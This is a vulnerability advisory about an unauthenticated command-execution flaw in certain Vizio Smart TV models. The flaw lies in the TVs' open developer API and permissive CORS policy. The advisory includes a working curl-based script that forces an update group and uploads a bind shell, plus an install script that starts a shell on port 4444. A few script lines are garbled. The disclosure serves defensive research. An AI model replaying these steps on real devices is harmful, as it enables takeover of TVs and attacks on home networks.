Unauthenticated Remote Code Execution on Vizio Smart TV

Unranked
Advisory IDL9-44-476PublishedJune 28, 2021UpdatedAugust 19, 2021
CategoryCommand InjectionVendorVizioProduct2018 P65-F1, 2017 E50x-E1Version6.0.31.4-2, 10.0.31.4-2

Risk Summary

A remote code execution vulnerability is present in several Vizio Smart TV models. A threat actor on the local network or an internet-connected Vizio TV can exploit the device, with no pre-conditions, to obtain OS-level command execution on the TV and maintain persistence. From this position, a threat actor can lay dormant on the TV and attack neighboring assets. The Vizio TV API, used primarily for control through the mobile web application, enables a threat actor to send unauthenticated developer commands, including the ability to upload and execute a binary file. While the network-based attack can be launched against any Vizio TV connected to Wi-Fi, LAN, or internet without any user interaction, another means of exploitation is possible through CSRF-based attack. A CSRF-based attack is possible due to the API's open cross-origin-resource-sharing (CORS) policy. A malicious CSRF request could be crafted and sent to a victim on the same network as the TV, resulting in exploitation of the TV upon victim interaction with the link.

Technical Details

The researcher performed the following procedures to upload a bind shell on the Vizio TV:

####################
### remote_install.sh ###
####################

HOST="192.168.1.175"
PORT=7345

# Place the device into a new override group
curl -k -s https://${HOST}:${PORT}/scpl/update/override_group -d "device_group=oobe-2020-dev"

# Check for new updates
curl -k -s https://${HOST}:${PORT}/scpl/update/available_update_info -d ""

# Force a device update
curl -k -s https://${HOST}:${PORT}/scpl/update/start_update -d ""

# Upload and install binary file
curl -k -s https://${HOST}:${PORT}/scpl/install -H "Expect:" -F "[email protected]_shell.tar.gz;type=application/x-gzip" -F "Install=Install"
###################
### bind_shell.tar.gz ###
###################
- bind_static (static bind shell - listens on port 4444)
- install.sh

###############
#### install.sh ####
###############
#!/bin/sh
echo "[*] Starting reverse shell"
/data/tv/tmp/scpl_install/reverse_static &

echo "[*] Expect a connection on port 4444"

Device info for 2018 P65-F1

Device info for 2018 P65-F1

Remote Install on 2018 P65-F1

Remote Install on 2018 P65-F1 Remote installer script forced the TV into a new group, then uploads a bind shell.

Device info for 2017 E50x-E1

Device info for 2017 E50x-E1

CSRF on 2017 E50x-E1

CSRF on 2017 E50x-E1 Payload is delivered using cross-site-request-forgery.

Remote Shell on 2017 E50x-E1

Remote Shell on 2017 E50x-E1 The TV connects back to a listening machine through a reverse shell.